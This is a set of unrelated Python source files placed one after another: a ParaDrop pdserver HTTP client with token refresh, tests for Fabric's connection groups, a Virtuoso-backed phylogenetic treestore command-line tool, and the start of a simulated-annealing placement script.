"""
internal: handles connection close events.
"""
if reason.check(twisted.web.client.ResponseDone):
try:
result = json.loads(self.data)
except ValueError:
result = None
self.finished.callback(PDServerResponse(self.response, data=result))
else:
raise Exception(reason.getErrorMessage())
def urlEncodeParams(data):
"""
Return data URL-encoded.
This function specifically handles None and boolean values
to convert them to JSON-friendly strings (e.g. None -> 'null').
"""
copy = dict()
for key, value in six.iteritems(data):
if value is None:
copy[key] = 'null'
elif isinstance(value, bool):
copy[key] = json.dumps(value)
else:
copy[key] = value
return urlencode(copy, doseq=True)
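# For example, urlEncodeParams({'a': None, 'b': True, 'c': 1}) yields the
# pairs a=null, b=true and c=1 joined with '&' (ordering follows dict
# iteration order).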
class PDServerResponse(object):
"""
A PDServerResponse object contains the results of a request to pdserver.
This wraps twisted.web.client.Response (cannot be subclassed) and exposes
the same variables in addition to a 'data' variables. The 'data' variable,
if not None, is the parsed object from the response body.
"""
def __init__(self, response, data=None):
self.version = response.version
self.code = response.code
self.phrase = response.phrase
self.headers = response.headers
self.length = response.length
self.success = (response.code >= 200 and response.code < 300)
self.data = data
class HTTPResponse(object):
def __init__(self, data=None):
self.version = None
self.code = None
self.phrase = None
self.headers = dict()
self.length = None
self.success = False
self.data = data
class HTTPRequestDriver(object):
def __init__(self):
self.headers = {
"Accept": "application/json",
"Connection": "keep-alive",
"Content-Type": "application/json",
"User-Agent": "ParaDrop/2.5"
}
def request(self, method, url, body):
raise Exception("Not implemented")
def setHeader(self, key, value):
self.headers[key] = value
class CurlRequestDriver(HTTPRequestDriver):
# Shared curl handle.
# May have problems due to issue #411.
# https://github.com/pycurl/pycurl/issues/411
curl = pycurl.Curl()
# Lock for the access to curl.
lock = DeferredLock()
code_pattern = re.compile(r"(HTTP\S*)\s+(\d+)\s+(.*)")
header_pattern = re.compile(r"(\S+): (.*)")
def __init__(self):
super(CurlRequestDriver, self).__init__()
# Buffer for receiving response.
self.buffer = six.StringIO()
# Fill in response object.
self.response = HTTPResponse()
def receive(self, ignore):
"""
Receive response from curl and convert it to a response object.
"""
data = self.buffer.getvalue()
response = self.response
# Try to parse the content if it's JSON.
contentType = response.headers.get('content-type', 'text/html')
if 'json' in contentType:
try:
response.data = json.loads(data)
except Exception:
print("Failed to parse JSON")
print(data)
response.data = data
else:
response.data = data
response.success = (response.code >= 200 and response.code < 300)
return response
def receiveHeaders(self, header_line):
header_line = header_line.strip()
match = CurlRequestDriver.code_pattern.match(header_line)
if match is not None:
self.response.version = match.group(1)
self.response.code = int(match.group(2))
self.response.phrase = match.group(3)
return
match = CurlRequestDriver.header_pattern.match(header_line)
if match is not None:
key = match.group(1).lower()
self.response.headers[key] = match.group(2)
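# receiveHeaders is called by pycurl once per header line: a status line such
# as "HTTP/1.1 200 OK" fills in version/code/phrase, while a header such as
# "Content-Type: application/json" is stored under the lower-cased key
# 'content-type' in self.response.headers.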
def request(self, method, url, body=None):
def makeRequest(ignored):
curl = CurlRequestDriver.curl
curl.reset()
curl.setopt(pycurl.URL, url)
curl.setopt(pycurl.HEADERFUNCTION, self.receiveHeaders)
curl.setopt(pycurl.WRITEFUNCTION, self.buffer.write)
curl.setopt(pycurl.CUSTOMREQUEST, method)
if body is not None:
curl.setopt(pycurl.POSTFIELDS, body)
headers = []
for key, value in six.iteritems(self.headers):
headers.append("{}: {}".format(key, value))
curl.setopt(pycurl.HTTPHEADER, headers)
d = threads.deferToThread(curl.perform)
d.addCallback(self.receive)
return d
def releaseLock(result):
CurlRequestDriver.lock.release()
# Forward the result to the next handler.
return result
d = CurlRequestDriver.lock.acquire()
# Make the request once we acquire the semaphore.
d.addCallback(makeRequest)
# Release the semaphore regardless of how the request goes.
d.addBoth(releaseLock)
return d
class TwistedRequestDriver(HTTPRequestDriver):
# Using a connection pool enables persistent connections, so we can avoid
# the connection setup overhead when sending multiple messages to the
# server.
pool = HTTPConnectionPool(reactor, persistent=True)
# Used to control the number of concurrent requests because
# HTTPConnectionPool does not do that on its own.
# Discussed here:
# http://stackoverflow.com/questions/25552432/how-to-make-pooling-http-connection-with-twisted
sem = DeferredSemaphore(settings.PDSERVER_MAX_CONCURRENT_REQUESTS)
def receive(self, response):
"""
Receive response from twisted web client and convert it to a
PDServerResponse object.
"""
deferred = Deferred()
response.deliverBody(JSONReceiver(response, deferred))
return deferred
def request(self, method, url, body=None):
def makeRequest(ignored):
bodyProducer = None
if body is not None:
bodyProducer = FileBodyProducer(six.StringIO(body))
headers = {}
for key, value in six.iteritems(self.headers):
headers[key] = [value]
agent = Agent(reactor, pool=TwistedRequestDriver.pool)
d = agent.request(method, url, Headers(headers), bodyProducer)
d.addCallback(self.receive)
return d
def releaseSemaphore(result):
TwistedRequestDriver.sem.release()
# Forward the result to the next handler.
return result
d = TwistedRequestDriver.sem.acquire()
# Make the request once we acquire the semaphore.
d.addCallback(makeRequest)
# Release the semaphore regardless of how the request goes.
d.addBoth(releaseSemaphore)
return d
class PDServerRequest(object):
"""
Make an HTTP request to pdserver.
The API is assumed to use application/json for sending and receiving data.
Authentication is automatically handled here if the router is provisioned.
We handle missing, invalid, or expired tokens by making the request and
detecting a 401 (Unauthorized) response. We request a new token and retry
the failed request. We do this at most once and return failure if the
second attempt returns anything other than 200 (OK).
PDServerRequest objects are not reusable; create a new one for each
request.
URL String Substitutions:
router_id -> router id
Example:
/routers/{router_id}/states -> /routers/halo06/states
"""
# Auth token (JWT): we will automatically request as needed (for the first
# request and after expiration) and store the token in memory for future
# requests.
token = None
def __init__(self, path, driver=TwistedRequestDriver, headers={}, setAuthHeader=True):
self.path = path
self.driver = driver
self.headers = headers
self.setAuthHeader = setAuthHeader
self.transportRetries = 0
url = nexus.core.info.pdserver
if not path.startswith('/'):
url += '/'
url += path
# Perform string substitutions.
self.url = url.format(router_id=nexus.core.info.pdid)
self.body = None
def get(self, **query):
self.method = 'GET'
if len(query) > 0:
self.url += '?' + urlEncodeParams(query)
d = self.request()
d.addCallback(self.receiveResponse)
return d
def patch(self, *ops):
"""
Expects a list of operations in jsonpatch format (http://jsonpatch.com/).
An example operation would be:
{'op': 'replace', 'path': '/completed', 'value': True}
"""
self.method = 'PATCH'
self.body = json.dumps(ops)
d = self.request()
d.addCallback(self.receiveResponse)
return d
def post(self, **data):
self.method = 'POST'
self.body = json.dumps(data)
d = self.request()
d.addCallback(self.receiveResponse)
return d
def put(self, **data):
self.method = 'PUT'
self.body = json.dumps(data)
d = self.request()
d.addCallback(self.receiveResponse)
return d
def request(self):
driver = self.driver()
if self.setAuthHeader and PDServerRequest.token is not None:
auth = 'Bearer {}'.format(PDServerRequest.token)
driver.setHeader('Authorization', auth)
for key, value in six.iteritems(self.headers):
driver.setHeader(key, value)
return driver.request(self.method, self.url, self.body)
def receiveResponse(self, response):
"""
Intercept the response object, and if it's a 401 authenticate and retry.
"""
if response.code == 401 and self.setAuthHeader:
# 401 (Unauthorized) may mean our token is no longer valid.
# Request a new token and then retry the request.
#
# Watch out for infinite recursion here! If this inner request
# returns a 401 code, meaning the id/password is invalid, it should
# not go down this code path again (prevented by check against
# self.setAuthHeader above).
authRequest = PDServerRequest('/auth/router', driver=self.driver,
setAuthHeader=False)
d = authRequest.post(id=nexus.core.info.pdid,
password=nexus.core.getKey('apitoken'))
def cbLogin(authResponse):
if authResponse.success:
PDServerRequest.token = authResponse.data.get('token', None)
# Retry the original request now that we have a new token.
return self.request()
else:
# Our attempt to get a token failed, so give up.
return PDServerResponse(response)
d.addCallback(cbLogin)
return d
else:
return response
@classmethod
def getServerInfo(c):
"""
Return the information needed to send API messages to the server.
This can be used by an external program (e.g. pdinstall).
"""
info = {
'authorization': 'Bearer {}'.format(c.token),
'router_id': nexus.core.info.pdid,
'server': nexus.core.info.pdserver
}
return info
@classmethod
def resetToken(c):
"""
Reset the auth token, to be called if the router's identity has changed.
"""
c.token = None
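# Minimal usage sketch (the endpoint and fields are illustrative assumptions,
# not part of a documented pdserver API):
#
#     request = PDServerRequest('/routers/{router_id}/states')
#     d = request.post(name='example', completed=True)
#     d.addCallback(lambda response: print(response.code, response.data))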
# Initialize pycurl. Does this do anything?
pycurl.global_init(pycurl.GLOBAL_ALL)
# Set the number of connections that can be kept alive in the connection pool.
# Setting this equal to the size of the semaphore should prevent churn.
TwistedRequestDriver.pool.maxPersistentPerHost = settings.PDSERVER_MAX_CONCURRENT_REQUESTS
|
|
from mock import Mock, patch, call
from pytest_relaxed import raises
from fabric import Connection, Group, SerialGroup, ThreadingGroup, GroupResult
from fabric.group import thread_worker
from fabric.exceptions import GroupException
class Group_:
class init:
"__init__"
def may_be_empty(self):
assert len(Group()) == 0
def takes_splat_arg_of_host_strings(self):
g = Group("foo", "bar")
assert g[0].host == "foo"
assert g[1].host == "bar"
class from_connections:
def inits_from_iterable_of_Connections(self):
g = Group.from_connections((Connection("foo"), Connection("bar")))
assert len(g) == 2
assert g[1].host == "bar"
def acts_like_an_iterable_of_Connections(self):
g = Group("foo", "bar", "biz")
assert g[0].host == "foo"
assert g[-1].host == "biz"
assert len(g) == 3
for c in g:
assert isinstance(c, Connection)
class run:
@raises(NotImplementedError)
def not_implemented_in_base_class(self):
Group().run()
def _make_serial_tester(cxns, index, args, kwargs):
args = args[:]
kwargs = kwargs.copy()
def tester(*a, **k): # Don't care about doing anything with our own args.
car, cdr = index, index + 1
predecessors = cxns[:car]
successors = cxns[cdr:]
for predecessor in predecessors:
predecessor.run.assert_called_with(*args, **kwargs)
for successor in successors:
assert not successor.run.called
return tester
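# _make_serial_tester builds the side_effect for connection number `index`:
# when that connection's run() fires, every earlier connection must already
# have been called with the same args/kwargs and no later connection may have
# run yet, which is what lets the SerialGroup test below assert serial order.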
class SerialGroup_:
class run:
def executes_arguments_on_contents_run_serially(self):
"executes arguments on contents' run() serially"
cxns = [Connection(x) for x in ("host1", "host2", "host3")]
args = ("command",)
kwargs = {"hide": True, "warn": True}
for index, cxn in enumerate(cxns):
side_effect = _make_serial_tester(cxns, index, args, kwargs)
cxn.run = Mock(side_effect=side_effect)
g = SerialGroup.from_connections(cxns)
g.run(*args, **kwargs)
# Sanity check, e.g. in case none of them were actually run
for cxn in cxns:
cxn.run.assert_called_with(*args, **kwargs)
def errors_in_execution_capture_and_continue_til_end(self):
cxns = [Mock(name=x) for x in ("host1", "host2", "host3")]
class OhNoz(Exception):
pass
onoz = OhNoz()
cxns[1].run.side_effect = onoz
g = SerialGroup.from_connections(cxns)
try:
g.run("whatever", hide=True)
except GroupException as e:
result = e.result
else:
assert False, "Did not raise GroupException!"
succeeded = {
cxns[0]: cxns[0].run.return_value,
cxns[2]: cxns[2].run.return_value,
}
failed = {cxns[1]: onoz}
expected = succeeded.copy()
expected.update(failed)
assert result == expected
assert result.succeeded == succeeded
assert result.failed == failed
def returns_results_mapping(self):
cxns = [Mock(name=x) for x in ("host1", "host2", "host3")]
g = SerialGroup.from_connections(cxns)
result = g.run("whatever", hide=True)
assert isinstance(result, GroupResult)
expected = {x: x.run.return_value for x in cxns}
assert result == expected
assert result.succeeded == expected
assert result.failed == {}
class ThreadingGroup_:
def setup(self):
self.cxns = [Connection(x) for x in ("host1", "host2", "host3")]
self.args = ("command",)
self.kwargs = {"hide": True, "warn": True}
class run:
@patch("fabric.group.Queue")
@patch("fabric.group.ExceptionHandlingThread")
def executes_arguments_on_contents_run_via_threading(
self, Thread, Queue
):
queue = Queue.return_value
g = ThreadingGroup.from_connections(self.cxns)
# Make sure .exception() doesn't yield truthy Mocks. Otherwise we
# end up with 'exceptions' that cause errors due to all being the
# same.
Thread.return_value.exception.return_value = None
g.run(*self.args, **self.kwargs)
# Testing that threads were used the way we expect is mediocre but
# I honestly can't think of another good way to assert "threading
# was used & concurrency occurred"...
instantiations = [
call(
target=thread_worker,
kwargs=dict(
cxn=cxn,
queue=queue,
args=self.args,
kwargs=self.kwargs,
),
)
for cxn in self.cxns
]
Thread.assert_has_calls(instantiations, any_order=True)
# These ought to work as by default a Mock.return_value is a
# singleton mock object
expected = len(self.cxns)
for name, got in (
("start", Thread.return_value.start.call_count),
("join", Thread.return_value.join.call_count),
):
err = (
"Expected {} calls to ExceptionHandlingThread.{}, got {}"
) # noqa
err = err.format(expected, name, got)
assert expected == got, err
@patch("fabric.group.Queue")
def queue_used_to_return_results(self, Queue):
# Regular, explicit, mocks for Connections
cxns = [Mock(host=x) for x in ("host1", "host2", "host3")]
# Set up Queue with enough behavior to work / assert
queue = Queue.return_value
# Ending w/ a True will terminate a while-not-empty loop
queue.empty.side_effect = (False, False, False, True)
fakes = [(x, x.run.return_value) for x in cxns]
queue.get.side_effect = fakes[:]
# Execute & inspect results
g = ThreadingGroup.from_connections(cxns)
results = g.run(*self.args, **self.kwargs)
expected = {x: x.run.return_value for x in cxns}
assert results == expected
# Make sure queue was used as expected within worker &
# ThreadingGroup.run()
puts = [call(x) for x in fakes]
queue.put.assert_has_calls(puts, any_order=True)
assert queue.empty.called
gets = [call(block=False) for _ in cxns]
queue.get.assert_has_calls(gets)
def bubbles_up_errors_within_threads(self):
# TODO: I feel like this is the first spot where a raw
# ThreadException might need tweaks, at least presentation-wise,
# since we're no longer dealing with truly background threads (IO
# workers and tunnels), but "middle-ground" threads the user is
# kind of expecting (and which they might expect to encounter
# failures).
cxns = [Mock(host=x) for x in ("host1", "host2", "host3")]
class OhNoz(Exception):
pass
onoz = OhNoz()
cxns[1].run.side_effect = onoz
g = ThreadingGroup.from_connections(cxns)
try:
g.run(*self.args, **self.kwargs)
except GroupException as e:
result = e.result
else:
assert False, "Did not raise GroupException!"
succeeded = {
cxns[0]: cxns[0].run.return_value,
cxns[2]: cxns[2].run.return_value,
}
failed = {cxns[1]: onoz}
expected = succeeded.copy()
expected.update(failed)
assert result == expected
assert result.succeeded == succeeded
assert result.failed == failed
def returns_results_mapping(self):
# TODO: update if/when we implement ResultSet
cxns = [Mock(name=x) for x in ("host1", "host2", "host3")]
g = ThreadingGroup.from_connections(cxns)
result = g.run("whatever", hide=True)
assert isinstance(result, GroupResult)
expected = {x: x.run.return_value for x in cxns}
assert result == expected
assert result.succeeded == expected
assert result.failed == {}
|
|
#!/usr/bin/env python
import Bio.Phylo as bp
import os
import re
import sha
import shutil
import sys
import pypyodbc as pyodbc
from pruner import Prunable
from annotate import Annotatable
from config import get_treestore_kwargs, base_uri, load_dir
import tempfile
import phylolabel
import time
from cStringIO import StringIO
import posixpath
from getpass import getpass
import rdflib
__version__ = '0.1.2'
kwargs = get_treestore_kwargs()
class Treestore(Prunable, Annotatable):
prefixes = [
('rdf', 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'),
('rdfs', 'http://www.w3.org/2000/01/rdf-schema#'),
('owl', 'http://www.w3.org/2002/07/owl#'),
('dc', 'http://purl.org/dc/elements/1.1/'),
('skos', 'http://www.w3.org/2004/02/skos/core#'),
('bibo', 'http://purl.org/ontology/bibo/'),
('foaf', 'http://xmlns.com/foaf/0.1/'),
('prism', 'http://prismstandard.org/namespaces/basic/2.0/'),
('obo', 'http://purl.obolibrary.org/obo/'),
('doi', 'http://dx.doi.org/')
]
def __init__(self, dsn=kwargs['dsn'], user=kwargs['user'], password=kwargs['password'],
load_dir=load_dir, base_uri=base_uri, verbose=False):
'''Create a treestore object from an ODBC connection with given DSN,
username and password.'''
self.dsn = dsn
self.user = user
self.password = password
self.load_dir = load_dir
self.base_uri = base_uri
self.verbose = verbose
self._connection = None
self._cursor = None
@classmethod
def uri_from_id(self, x, base_uri=base_uri):
if '://' in x: return x
if not x.endswith('/'): x += '/'
return posixpath.join(base_uri, x)
@classmethod
def id_from_uri(self, x, base_uri=base_uri):
if x.startswith(base_uri): x = x[len(base_uri):].rstrip('/')
return x
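# Example round trip (assuming base_uri = 'http://www.example.org/trees/'):
#   uri_from_id('test') -> 'http://www.example.org/trees/test/'
#   id_from_uri('http://www.example.org/trees/test/') -> 'test'
# Strings that already contain '://' are passed through unchanged.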
def validate_filter(self, x):
if not x: return x
for banned_word in 'delete', 'insert':
if banned_word in x.lower():
raise Exception("Can't use the word %s in a filter." % banned_word)
return x
def get_connection(self):
if not self._connection:
self._connection = pyodbc.connect('DSN=%s;UID=%s;PWD=%s' %
(self.dsn, self.user, self.password),
autocommit=True)
return self._connection
def close(self):
if self._connection:
self._connection.close()
self._connection = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
connection = property(get_connection)
def get_cursor(self, need_new=False):
connection = self.connection
if need_new: return connection.cursor()
if not self._cursor: self._cursor = connection.cursor()
return self._cursor
def add_trees(self, tree_file, format, tree_uri=None, rooted=False,
taxonomy=None, tax_root=None):
'''Convert trees residing in a text file into RDF, and add them to the
underlying RDF store with a context node for retrieval.
Example:
>>> treestore.add_trees('test.newick', 'newick', 'http://www.example.org/test/')
'''
if tree_uri is None: tree_uri = os.path.basename(tree_file)
else: tree_uri = self.uri_from_id(tree_uri)
hash = sha.sha()
hash.update(str(time.time()))
tempfile_name = '%s.cdao' % hash.hexdigest()
if taxonomy:
# label higher-order taxa before adding
phylogeny = bp.read(tree_file, format)
if isinstance(taxonomy, basestring):
taxonomy = self.get_trees(self.uri_from_id(taxonomy))[0]
phylolabel.label_tree(phylogeny, taxonomy, tax_root=tax_root)
with open(os.path.join(self.load_dir, tempfile_name), 'w') as output_file:
bp._io.write([phylogeny], output_file, 'cdao')
else:
if format == 'cdao':
# if it's already in CDAO format, just copy it
f1, f2 = tree_file, os.path.join(self.load_dir, tempfile_name)
if not os.path.abspath(f1) == os.path.abspath(f2):
shutil.copy(f1, f2)
else:
# otherwise, convert to CDAO
bp.convert(tree_file, format, os.path.join(self.load_dir, tempfile_name), 'cdao',
tree_uri=tree_uri, rooted=rooted)
# run the bulk loader to load the CDAO tree into Virtuoso
cursor = self.get_cursor()
update_stmt = 'sparql load <file://%s> into %s' % (
os.path.abspath(os.path.join(self.load_dir, tempfile_name)), rdflib.URIRef(tree_uri).n3())
load_stmt = "ld_dir ('%s', '%s', '%s')" % (
os.path.abspath(self.load_dir), tempfile_name, tree_uri)
print load_stmt
cursor.execute(load_stmt)
update_stmt = "rdf_loader_run()"
print update_stmt
cursor.execute(update_stmt)
# the next treestore add may not work if you don't explicitly delete
# the bulk load list from the Virtuoso db after it's done
cursor.execute('DELETE FROM DB.DBA.load_list')
os.remove(os.path.join(self.load_dir, tempfile_name))
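# In short: the tree is staged in load_dir as a CDAO RDF file, registered with
# ld_dir(), loaded into the named graph by rdf_loader_run(), and the staging
# file plus the DB.DBA.load_list entry are then cleaned up.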
def get_trees(self, tree_uri):
'''Retrieve trees that were previously added to the underlying RDF
store. Returns a generator of Biopython trees.
Example:
>>> trees = treestore.get_trees('http://www.example.org/test/')
>>> trees.next()
Tree(weight=1.0, rooted=False)
'''
tree_uri = self.uri_from_id(tree_uri)
return [self.subtree(None, tree_uri)]
def serialize_trees(self, tree_uri='', format='newick', trees=None, handle=None):
'''Retrieve trees serialized to any format supported by Biopython.
Current options include 'newick', 'nexus', 'phyloxml', 'nexml', and 'cdao'
Example:
>>> treestore.serialize_trees('http://www.example.org/test/')
'''
if handle: s = handle
else: s = StringIO()
if tree_uri: tree_uri = self.uri_from_id(tree_uri)
if trees is None:
trees = [(x for x in self.get_trees(tree_uri)).next()]
if not trees:
raise Exception('Tree to be serialized not found.')
if format == 'cdao':
bp.write(trees, s, format, tree_uri=tree_uri)
elif format == 'ascii':
bp._utils.draw_ascii((i for i in trees).next(), file=s)
else:
bp.write(trees, s, format)
if handle: return
return s.getvalue()
def remove_trees(self, tree_uri):
'''Remove trees from treestore. Be careful with this; it really just
removes a named graph, so if Virtuoso contains named graphs other than
trees, those can be deleted too.
Example:
>>> treestore.remove_trees('http://www.example.org/test/')
'''
tree_uri = self.uri_from_id(tree_uri)
cursor = self.get_cursor()
cursor.execute('sparql clear graph %s' % rdflib.URIRef(tree_uri).n3())
def list_trees(self, **kwargs):
'''List all trees in the treestore.'''
return self.list_trees_containing_taxa(**kwargs)
def list_trees_containing_taxa(self, contains=[], show_counts=False, taxonomy=None, filter=None):
'''List all trees that contain the specified taxa.'''
filter = self.validate_filter(filter)
taxa_list = ', '.join([rdflib.Literal(contain).n3() for contain in contains])
# TODO: if filter: sanitize filter
query = '''
SELECT DISTINCT ?graph (count(DISTINCT ?label) as ?matches)
WHERE {
{
GRAPH ?graph {
?tree obo:CDAO_0000148 [] .
'''
if contains:
query += '{ ?match rdfs:label ?label . FILTER (?label in (%s)) }' % taxa_list
if filter:
query += filter
query += '''
}
}
'''
# optional synonym matching
if taxonomy and contains:
taxonomy = self.uri_from_id(taxonomy)
query += '''
UNION {
GRAPH ?graph {
?tree obo:CDAO_0000148 [] .
?t obo:CDAO_0000187 [ rdfs:label ?synonym ] . %s
}
GRAPH %s {
?x obo:CDAO_0000187 [ ?l1 ?synonym ; ?l2 ?label ]
FILTER (?label in (%s) &&
?l1 in (rdfs:label, skos:altLabel) &&
?l2 in (rdfs:label, skos:altLabel))
}
}''' % (filter if filter else '', rdflib.URIRef(taxonomy).n3(), taxa_list)
# end of query
query += '''
}
GROUP BY ?graph
ORDER BY DESC(?matches) CONTAINS(STR(?graph), "_taxonomy") ?graph
'''
query = self.build_query(query)
cursor = self.get_cursor()
if self.verbose: print query
cursor.execute(query)
for result in cursor:
if show_counts: yield (result[0], result[1])
else: yield (result[0])
def get_names(self, tree_uri=None, format=None):
if tree_uri: tree_uri = self.uri_from_id(tree_uri)
query = '''sparql
PREFIX obo: <http://purl.obolibrary.org/obo/>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT DISTINCT ?uri, ?label
WHERE {
GRAPH %s {
[] obo:CDAO_0000148 [] .
?uri rdfs:label ?label .
}
}
ORDER BY ?label
''' % ((rdflib.URIRef(tree_uri).n3()) if tree_uri else '?graph')
cursor = self.get_cursor()
if self.verbose: print query
cursor.execute(query)
results = cursor
if format == 'json':
metadata = {
"version":"",
"treestoreMetadata":{
"treestoreShortName":"rdf_treestore",
"treestoreLongName":"Phylotastic RDF Treestore",
"domain":"",
"urlPrefix":"",
}
}
json_dict = {'metadata': {}, 'externalSources': {},
'names': [{
'name': str(result[1]),
'treestoreId': str(result[0]),
'sourceIds': {},
}
for result in results
]
}
return repr(json_dict)
elif format == 'csv':
return ','.join(sorted(list(set([str(result[1]) for result in results]))))
else:
return [str(result[1]) for result in results]
def build_query(self, query):
return 'sparql\n' + '\n'.join(['PREFIX %s: <%s>' % x for x in self.prefixes]) + query
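# For example, build_query('SELECT ?s WHERE { ?s ?p ?o }') yields the string
# 'sparql' followed by one 'PREFIX rdf: <...>' line per entry in self.prefixes
# and then the query text, which is the form Virtuoso expects over ODBC.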
def get_tree_info(self, tree_uri=None):
if tree_uri: tree_uri = self.uri_from_id(tree_uri)
query = self.build_query('''
SELECT ?graph (count(?otu) as ?taxa) ?citation
WHERE {
GRAPH ?graph {
?tree obo:CDAO_0000148 [] .
?otu obo:CDAO_0000187 [] .
OPTIONAL { ?tree bibo:cites ?citation . }
}
%s
}
ORDER BY ?graph
''' % ('' if tree_uri is None else ('FILTER(?graph = %s)' % rdflib.URIRef(tree_uri).n3())))
cursor = self.get_cursor()
if self.verbose: print query
cursor.execute(query)
return [{k:v for k, v in zip(('tree', 'taxa', 'citation'), result) } for result in cursor]
def get_object_info(self, object):
query = '''sparql
SELECT ?v ?o
WHERE
{
?s ?v ?o .
FILTER (?s = %s)
}''' % rdflib.URIRef(object).n3()
cursor = self.get_cursor(True)
if self.verbose: print query
cursor.execute(query)
return cursor
def main():
import argparse
bp_formats = ' | '.join(bp._io.supported_formats)
input_formats = bp_formats
output_formats = '%s | ascii' % bp_formats
parser = argparse.ArgumentParser()
parser.add_argument('--version', action='version', version=__version__)
parser.add_argument('-v', '--verbose', action='store_true', help='write out SPARQL queries before executing')
parser.add_argument('-s', '--store', help='name of Redland store (default=virtuoso)')
parser.add_argument('-d', '--dsn', help='ODBC DSN (default=Virtuoso)')
parser.add_argument('-u', '--user', help='ODBC user (default=dba)')
parser.add_argument('-p', '--password', help='ODBC password (default=dba)')
subparsers = parser.add_subparsers(help='sub-command help', dest='command')
# treestore add: add trees to the database
add_parser = subparsers.add_parser('add', help='add trees to treestore')
add_parser.add_argument('file', help='tree file')
add_parser.add_argument('uri', help='tree uri (default=file name)', nargs='?', default=None)
add_parser.add_argument('-f', '--format', help='file format (%s)' % input_formats,
nargs='?', default='newick')
add_parser.add_argument('--rooted', help='this is a rooted tree', action='store_true')
add_parser.add_argument('--taxonomy', help="the URI of a taxonomy graph to label higher-order taxa",
nargs='?', default=None)
add_parser.add_argument('--tax-root', help="the name of the top-most taxonomic group in the tree, used to subset the taxonomy and avoid homonymy issues",
nargs='?', default=None)
# treestore get: download an entire tree
get_parser = subparsers.add_parser('get', help='retrieve trees from treestore')
get_parser.add_argument('uri', help='tree uri')
get_parser.add_argument('-f', '--format', help='serialization format (%s) (default=newick)' % output_formats,
nargs='?', default='newick')
# treestore rm: delete trees from the database
rm_parser = subparsers.add_parser('rm', help='remove trees from treestore')
rm_parser.add_argument('uri', help='tree uri')
# treestore ls: list trees
ls_parser = subparsers.add_parser('ls', help='list all trees in treestore')
ls_parser.add_argument('contains', help='comma-delimited list of desired taxa',
nargs='?', default='')
ls_parser.add_argument('--counts', help="display the number of matched taxa next to each tree URI",
action='store_true')
ls_parser.add_argument('-l', help="list one per line; don't try to pretty-print",
action='store_true')
ls_parser.add_argument('-f', help="show full URIs instead of just IDs",
action='store_true')
ls_parser.add_argument('--taxonomy', help="the URI of a taxonomy graph to enable synonymy lookup",
nargs='?', default=None)
ls_parser.add_argument('--filter', help="SPARQL graph pattern that returned trees must match",
nargs='?', default=None)
# treestore names: get list of taxa contained in a tree
names_parser = subparsers.add_parser('names',
help='return a comma-separated list of all taxa names')
names_parser.add_argument('uri', help='tree uri (default=all trees)',
nargs='?', default=None)
names_parser.add_argument('-f', '--format', help='file format (json, csv, xml) (default=csv)',
default='csv')
# treestore count: count the number of labeled nodes
count_parser = subparsers.add_parser('count',
help='returns the number of labeled nodes in a tree')
count_parser.add_argument('uri', help='tree uri (default=all trees)',
nargs='?', default=None)
# treestore query: create a subtree from a list of taxa
query_parser = subparsers.add_parser('query',
help='retrieve the best subtree containing a given set of taxa')
query_parser.add_argument('contains', help='comma-delimited list of desired taxa',
nargs='?')
query_parser.add_argument('uri', help='tree uri (default=select automatically)',
nargs='?', default=None)
query_parser.add_argument('-f', '--format', help='serialization format (%s) (default=newick)' % output_formats,
nargs='?', default='newick')
query_parser.add_argument('--complete', help="return complete subtree from MRCA; don't prune other taxa from the resulting tree",
action='store_true')
query_parser.add_argument('--taxonomy', help="the URI of a taxonomy graph to enable synonymy lookup",
nargs='?', default=None)
query_parser.add_argument('--filter', help="SPARQL graph pattern that returned trees must match",
nargs='?', default=None)
# treestore annotate: add metadata annotations to tree
ann_parser = subparsers.add_parser('annotate', help='annotate tree with triples from RDF file')
ann_parser.add_argument('uri', help='tree uri', default=None)
ann_parser.add_argument('--file', help='annotation file')
ann_parser.add_argument('--text', help='annotation, in turtle format', default=None)
ann_parser.add_argument('--doi', help='tree source DOI', default=None)
args = parser.parse_args()
if args.dsn: kwargs['dsn'] = args.dsn
if args.user: kwargs['user'] = args.user
if args.password: kwargs['password'] = args.password
elif 'password' not in kwargs: kwargs['password'] = getpass()
kwargs['verbose'] = args.verbose
treestore = Treestore(**kwargs)
if args.command == 'add':
# parse a tree and add it to the treestore
treestore.add_trees(args.file, args.format, args.uri, rooted=args.rooted,
taxonomy=args.taxonomy, tax_root=args.tax_root)
elif args.command == 'get':
# get a tree, serialize in specified format, and output to stdout
treestore.serialize_trees(args.uri, args.format, handle=sys.stdout)
elif args.command == 'rm':
# remove a certain tree from the treestore
treestore.remove_trees(args.uri)
elif args.command == 'ls':
# list all trees in the treestore or trees containing a list of taxa
contains = args.contains
if contains:
contains = set([s.strip() for s in contains.split(',')])
trees = list(treestore.list_trees_containing_taxa(
contains=contains, taxonomy=args.taxonomy,
show_counts=args.counts, filter=args.filter))
if args.counts: trees = ['%s (%s)' % tree for tree in trees]
else: trees = [str(x) for x in trees]
else:
trees = list(treestore.list_trees(filter=args.filter))
if not trees: exit()
if not args.f:
trees = [treestore.id_from_uri(x) for x in trees]
if args.l:
print '\n'.join(trees)
else:
import lscolumns
lscolumns.printls(trees)
elif args.command == 'names':
print treestore.get_names(tree_uri=args.uri, format=args.format)
elif args.command == 'count':
print len([r for r in treestore.get_names(tree_uri=args.uri, format=None)])
elif args.command == 'query':
contains = set([s.strip() for s in args.contains.split(',')])
treestore.get_subtree(contains=contains, tree_uri=args.uri,
format=args.format,
prune=not args.complete,
taxonomy=treestore.uri_from_id(args.taxonomy) if args.taxonomy else None,
filter=args.filter,
handle=sys.stdout,
)
elif args.command == 'annotate':
treestore.annotate(args.uri, annotations=args.text, annotation_file=args.file, doi=args.doi)
if __name__ == '__main__':
main()
|
|
#Author: Jaspreet Jhoja
#contact:Jaspreetj@ece.ubc.ca
import random,copy, statistics, timeit, threading, math
from math import *
import numpy as np
import matplotlib.pyplot as plt
import plot as pt
import queue as Queue
print("SIMULATED ANNEALING BASED PLACER")
files = ['cm138a.txt', 'cm150a.txt', 'cm151a.txt', 'cm162a.txt', 'alu2.txt', 'C880.txt',
'e64.txt', 'apex1.txt', 'cps.txt', 'paira.txt', 'pairb.txt', 'apex4.txt']
for i in range(len(files)):
print('['+str(i)+']'+' - '+ files[i])
choice = input("choose files to run")
gui_choice = input("Do you want to see the progress in a GUI? y/n")
#if you want to use custom iterations and temperature, define here
user_iterations = 0
user_temp = 0
#set to 1 to run a mix of temperature-update schedules (see the hybrid branch below)
hybrid = 0
#for choice in range(len(files)):
for i in range(1):
filename = files[int(choice)]
print(filename)
global nets, nodes, grid, netsn, nodesn, plot_x, plot_y
